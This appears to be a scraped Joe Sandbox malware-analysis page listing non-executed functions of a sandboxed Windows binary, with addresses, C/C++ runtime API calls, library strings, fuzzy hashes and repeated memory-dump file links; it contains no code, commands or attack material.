Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: 965fe8e25530f16ec4401e9a498e8b86f701c27cafe4852159a5c1a85cec5717
Instruction ID: 924f1f0ce084bd93915fcf2c0eec8bfd8f706e7dcec003fec400f20ac6b90118
Opcode Fuzzy Hash: 965fe8e25530f16ec4401e9a498e8b86f701c27cafe4852159a5c1a85cec5717
Instruction Fuzzy Hash: C2E092A2F4921A41FD59F71B7D921A95211AF89FC8A988870CE4C0B742EC2DD8D34750

Non-executed Functions

Function 00007FF729F8EF16 Relevance: 14.1, APIs: 6, Strings: 1, Instructions: 1861stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF729F8EF56
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF729F90E84

Strings

inity, xrefs: 00007FF729F8F6A8

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID: _errnostrlen
String ID: inity
API String ID: 860928405-2893408212
Opcode ID: 5bbb7f154341fc19ee67e97848e74b0aff3d4d6e9d21a44a62ef9a5c1f602feb
Instruction ID: 30dff15a4bc37ae97dd080d3b02345bb90db4e01cd827158e3cd917b88c7882c
Opcode Fuzzy Hash: 5bbb7f154341fc19ee67e97848e74b0aff3d4d6e9d21a44a62ef9a5c1f602feb
Instruction Fuzzy Hash: 56231972A04686CEE7B0DF79C8447EC77B1FB48348F548135DA09ABB49DB38D6809B60

Function 00007FF72A077640 Relevance: 12.3, APIs: 6, Strings: 2, Instructions: 320COMMON

Download Yara Rule

APIs

wcslen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF72A077650
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00007FF72A07769E
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00007FF72A07775E

Strings

basic_string::append, xrefs: 00007FF72A0776F8, 00007FF72A0777B8, 00007FF72A077869, 00007FF72A07794D, 00007FF72A077960, 00007FF72A077A09
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF72A077954

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID: memcpy$wcslen
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::append
API String ID: 1844840824-4063909124
Opcode ID: 282633a9cc72f4201cfc29e893ecc0b1e7fe6948553353cc08063c78b4bcf708
Instruction ID: 0d238c344f716eda13bacba563cb088ebcbde5b4c98e8d160599bb30d31cd1a2
Opcode Fuzzy Hash: 282633a9cc72f4201cfc29e893ecc0b1e7fe6948553353cc08063c78b4bcf708
Instruction Fuzzy Hash: B4A19F62A08A5781FB20AF69DC005BCA361EB45BD4BD48272DE1D473D5EE3CE542CB60

Function 00007FF729F815E0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 40libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 00007FF729F815F7
LoadLibraryA.KERNEL32 ref: 00007FF729F81608
GetProcAddress.KERNEL32 ref: 00007FF729F81626
GetProcAddress.KERNEL32 ref: 00007FF729F81635

Strings

libgcc_s_dw2-1.dll, xrefs: 00007FF729F815ED
__deregister_frame_info, xrefs: 00007FF729F81628
__register_frame_info, xrefs: 00007FF729F81615

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID: AddressProc$HandleLibraryLoadModule
String ID: __deregister_frame_info$__register_frame_info$libgcc_s_dw2-1.dll
API String ID: 384173800-1835852900
Opcode ID: 7f6edc4b77b1e73b86a30ec1211ae682459a3124275125113fada9b650340b88
Instruction ID: 0325a421980ddaa601470d0f7255e8f67cc8ae399c7db6283fd68860be9a7e54
Opcode Fuzzy Hash: 7f6edc4b77b1e73b86a30ec1211ae682459a3124275125113fada9b650340b88
Instruction Fuzzy Hash: EB01E864B09A2BA1FAA1BF05BC001B4E3B5FF48794FD84171C84D17364AF2CE646DB20

Function 00007FF729FCDE10 Relevance: 12.2, APIs: 6, Strings: 2, Instructions: 228stringCOMMON

Download Yara Rule

APIs

strcmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF729FCDE65
strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF729FCDE7B
strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF729FCDECE
strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF729FCDF37
strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF729FCDF92
strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF729FCDFF7

Strings

basic_string::append, xrefs: 00007FF729FCE102, 00007FF729FCE10E, 00007FF729FCE11A, 00007FF729FCE126
*, xrefs: 00007FF729FCE0B0

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID: strlen$strcmp
String ID: *$basic_string::append
API String ID: 551667898-3732199748
Opcode ID: 21e32c51ea07e2c7da12383eba96a1f2ee0e31a9f34c1a7bfdf50ac497e45d5d
Instruction ID: b90a8f6eb4238863dc7e5e3f98d17e04578a829f753df05e88471a3545408ed8
Opcode Fuzzy Hash: 21e32c51ea07e2c7da12383eba96a1f2ee0e31a9f34c1a7bfdf50ac497e45d5d
Instruction Fuzzy Hash: 5F819D22B08A8681FB60EF26DC4037DA361EB45F84F888931DE5D477D5DE3EE9419B60

Function 00007FF72A079E60 Relevance: 10.8, APIs: 4, Strings: 3, Instructions: 264COMMON

Download Yara Rule

APIs

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00007FF72A079EE9

Strings

basic_string::basic_string, xrefs: 00007FF72A079F21, 00007FF72A07A009
string::string, xrefs: 00007FF72A07A0E9
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF72A079F28, 00007FF72A07A010, 00007FF72A07A0F0

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID: memcpy
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::basic_string$string::string
API String ID: 3510742995-937311740
Opcode ID: 7d65b6d2497f7b4197254a4bfd9bd5ee0819c960aa76c3d80a70703ec9362feb
Instruction ID: 79bb10d221301d6af21ecb137afb20681f5808f1b08c9f80f2119a9f95cd3845
Opcode Fuzzy Hash: 7d65b6d2497f7b4197254a4bfd9bd5ee0819c960aa76c3d80a70703ec9362feb
Instruction Fuzzy Hash: 5B818C62B04A4295EB30AF16ED005B9E365FB49BD4FC84172EE8C4BB85EE3CD685C710

Function 00007FF72A0793C0 Relevance: 10.8, APIs: 4, Strings: 3, Instructions: 264COMMON

Download Yara Rule

APIs

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00007FF72A079449

Strings

basic_string::basic_string, xrefs: 00007FF72A079481, 00007FF72A079569
string::string, xrefs: 00007FF72A079649
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF72A079488, 00007FF72A079570, 00007FF72A079650

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID: memcpy
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::basic_string$string::string
API String ID: 3510742995-937311740
Opcode ID: c5e1539735b8215ac2f6ddfad73bd5e52e724e91942d7afdbb3b2f30a2e09a19
Instruction ID: 03b2bee88a051581c95c0961e489c033577fe755ae27d2b111437fcfc6e9ace9
Opcode Fuzzy Hash: c5e1539735b8215ac2f6ddfad73bd5e52e724e91942d7afdbb3b2f30a2e09a19
Instruction Fuzzy Hash: 9381BE62B04A5295EB70AF16ED005B9E365FB09BD4FC84232EE8C4BB55EE3CD585C710

Function 00007FF729F8AFA0 Relevance: 7.8, APIs: 4, Strings: 1, Instructions: 349stringCOMMON

Download Yara Rule

APIs

strncmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF729F8AFE1
strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF729F8B0EE

Strings

_GLOBAL_, xrefs: 00007FF729F8AFD7

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID: strlenstrncmp
String ID: _GLOBAL_
API String ID: 1310274236-770460502
Opcode ID: 3f6e2dd7aa98c3b2ab22019e9bf9c0c08cd28e0503740a5061860dd6025ae2f3
Instruction ID: 63af1b8ff51c412fea2c74e4bb1d83c6cf4d413261b3d8e4e5ced81ce0c62bd4
Opcode Fuzzy Hash: 3f6e2dd7aa98c3b2ab22019e9bf9c0c08cd28e0503740a5061860dd6025ae2f3
Instruction Fuzzy Hash: 13E1E272A1868289F7E09F3598143FDBBB1FB04749F884135DA5C2A789CF38D741AB20

Function 00007FF729F93FFA Relevance: 5.9, APIs: 1, Strings: 2, Instructions: 1364COMMON

Download Yara Rule

Strings

NaN, xrefs: 00007FF729F9412E
Infinity, xrefs: 00007FF729F940FD

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID:
String ID: Infinity$NaN
API String ID: 0-4285296124
Opcode ID: aafcee3c9c93976f574e5bb8fcfa2386e6dceb65d2947290c98fbd634e234a5b
Instruction ID: 49338b64530d3f42fbe4f026542c759908f97e49cab3b8e6e4aa72105780d380
Opcode Fuzzy Hash: aafcee3c9c93976f574e5bb8fcfa2386e6dceb65d2947290c98fbd634e234a5b
Instruction Fuzzy Hash: 35E24832A04B958EE7A1DF79C8403AC77B1FB5538CF548225EA0D5BB58DB38E681DB10

Function 00007FF72A0688B0 Relevance: 4.7, APIs: 2, Strings: 1, Instructions: 181COMMON

Download Yara Rule

Strings

locale::_Impl::_M_replace_facet, xrefs: 00007FF72A068910, 00007FF72A0689A8

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID:
String ID: locale::_Impl::_M_replace_facet
API String ID: 0-4011348548
Opcode ID: 72738f8994c262bb5f7799b77502c2562ce0aaf15e0745a18c629bb13c54be0d
Instruction ID: db969e3728b64d79880566993c7f75d7a04a681946fc695416b7ec0e5654cde6
Opcode Fuzzy Hash: 72738f8994c262bb5f7799b77502c2562ce0aaf15e0745a18c629bb13c54be0d
Instruction Fuzzy Hash: E061C272B15B4281FF289F16DC50278A361FB94FA8F948339CE2D07390EF29D5958B64

Function 00007FF729FD37E0 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 71COMMON

Download Yara Rule

APIs

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00007FF729FD3871

Strings

basic_string::substr, xrefs: 00007FF729FD38A9
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF729FD38B0

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID: memcpy
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::substr
API String ID: 3510742995-3532027576
Opcode ID: 6560ae8b6e28ef5645acd1f01819da82bef78dba976e931c9711306df1fb382c
Instruction ID: 0193d0d683853433267d2cd5ab9c6a5dea8d5c8e142745c132cf4e518a0c1d70
Opcode Fuzzy Hash: 6560ae8b6e28ef5645acd1f01819da82bef78dba976e931c9711306df1fb382c
Instruction Fuzzy Hash: 7921B063B08A4285EA60AF16ED405A9E360EB45FD8FCC4131DF8D47751EE7CD692C720

Function 00007FF729FDE2A0 Relevance: 4.2, APIs: 2, Instructions: 1706COMMON

Download Yara Rule

APIs

wcslen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF729FDE3A8

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID: wcslen
String ID:
API String ID: 4088430540-0
Opcode ID: f3cb1d95bc54287335062b45fbd9652e952e49de895b6ced02b1f1b1d36cfaf5
Instruction ID: 57fbf1de1347129815e32bfa9f36399f4d5b56e7bdb547552b969bf008cef195
Opcode Fuzzy Hash: f3cb1d95bc54287335062b45fbd9652e952e49de895b6ced02b1f1b1d36cfaf5
Instruction Fuzzy Hash: EDF27F36608BD585EBA09F26E8403AEB7B5FB85B84F894522DECD03B94DF38D541DB10

Function 00007FF729F848C0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 621COMMON

Download Yara Rule

Strings

decltype(nullptr), xrefs: 00007FF729F8608C

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID:
String ID: decltype(nullptr)
API String ID: 0-1940065048
Opcode ID: 78828b7db6fe318bbf2009b3bed0eca2d93f8c7d3666377adfd48aacc70b5d23
Instruction ID: 78c09a75c8c486d83c3903f5ef26b9ddc353a44b4ff80503b192aa3679cd5826
Opcode Fuzzy Hash: 78828b7db6fe318bbf2009b3bed0eca2d93f8c7d3666377adfd48aacc70b5d23
Instruction Fuzzy Hash: 9232D652E0C28645FBE4AE155C05379F6E6FB42B84FDC8031C64D277C6DE2CEA91AB60

Function 00007FF72A0103E0 Relevance: 3.0, APIs: 2, Instructions: 536COMMON

Download Yara Rule

APIs

wcslen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF72A0104F1

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID: wcslen
String ID:
API String ID: 4088430540-0
Opcode ID: d5ba5f46809b4bc38e68fbdece770d2cb77e27869f3d51206183a512e30fadf5
Instruction ID: 3c048f577c343e4adcb0773eda9912dd952dd412e21127220b14eb14e5952925
Opcode Fuzzy Hash: d5ba5f46809b4bc38e68fbdece770d2cb77e27869f3d51206183a512e30fadf5
Instruction Fuzzy Hash: E9329D26A08A8285FB71AF29D8407FDA360FB88B54F945671DE8D177A4FF38D445CB20

Function 00007FF729F85360 Relevance: 2.8, Strings: 2, Instructions: 276COMMON

Download Yara Rule

Strings

std, xrefs: 00007FF729F8561D
string literal, xrefs: 00007FF729F8576D

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID:
String ID: std$string literal
API String ID: 0-2980153874
Opcode ID: eb845e9d3f49ee4b7da220122d2df9fa13bdbd68aa978b1a0c0a98639591395f
Instruction ID: 7c600c95593146c67e1223b9a310afb17e22207a118fcf6fc1a8800f9da60e7c
Opcode Fuzzy Hash: eb845e9d3f49ee4b7da220122d2df9fa13bdbd68aa978b1a0c0a98639591395f
Instruction Fuzzy Hash: D8B190B290974247EBE4AF159850279E7F2FB41B88FDC4170CA0D27395DE3CEA51AB50

Function 00007FF729FDA8B0 Relevance: 2.6, APIs: 1, Instructions: 1380COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
